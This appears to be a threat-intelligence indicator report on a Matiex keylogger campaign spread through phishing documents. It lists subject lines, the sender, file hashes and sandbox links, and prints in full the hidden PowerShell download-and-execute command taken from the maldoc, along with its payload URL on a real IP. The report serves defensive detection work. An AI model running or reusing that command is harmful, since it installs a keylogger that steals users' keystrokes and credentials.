2021-09-16 Matiex Keylogger IOCs

THREAT IDENTIFICATION:  MATIEX KEYLOGGER 

SUBJECTS OBSERVED
PURCHASE INQUIRY
URGENT INQUIRY

SENDERS OBSERVED
asia.travers@actiondrug.com

MALDOC FILE HASHES
PURCHASE INQUIRY.doc
776ae5196f616bd6bf2a7fe34d7a5812

COMPANY PROFILE.rtf
776ae5196f616bd6bf2a7fe34d7a5812

POWERSHELL FROM THE MALDOC
powershell.exe [3356]
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.110.170/win32/HTM.exe','C:\Users\analyst\AppData\Roaming\HTM.exe');Start-Process 'C:\Users\analyst\AppData\Roaming\HTM.exe'"

MATIEX PAYLOAD DOWNLOAD URL
http://192.3.110.170/win32/HTM.exe

MATIEX KEYLOGGER PAYLOAD FILE HASHES
HTM.exe
ce5451bcdc0d951b27cb1f42d4f8a4f8

Copied / renamed:
YIkvAXcbPxbbQC.exe
ce5451bcdc0d951b27cb1f42d4f8a4f8

MATIEX KEYLOGGER EXFILTRATION TRAFFIC SENT VIA
Not Observed

MATIEX KEYLOGGER ADDITIONAL CONTACTED URLS
https://freegeoip.app/xml/
http://checkip.dyndns.org
https://www.geodatatool.com/en

STRINGS OBSERVED IN MEMORY
https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
--M-A-T-I-E-X--K-E-Y-L-O-G-E-R--
kip.dyndns.com

SUPPORTING EVIDENCE
https://www.virustotal.com/gui/file/205995e5835ec0afdb827c868f5ec7e8f87f0328ca85ade3ac73cc585790a242
https://app.any.run/tasks/989b00d0-381d-4533-8fc6-300f25b45553/
https://tria.ge/210916-skc32ageel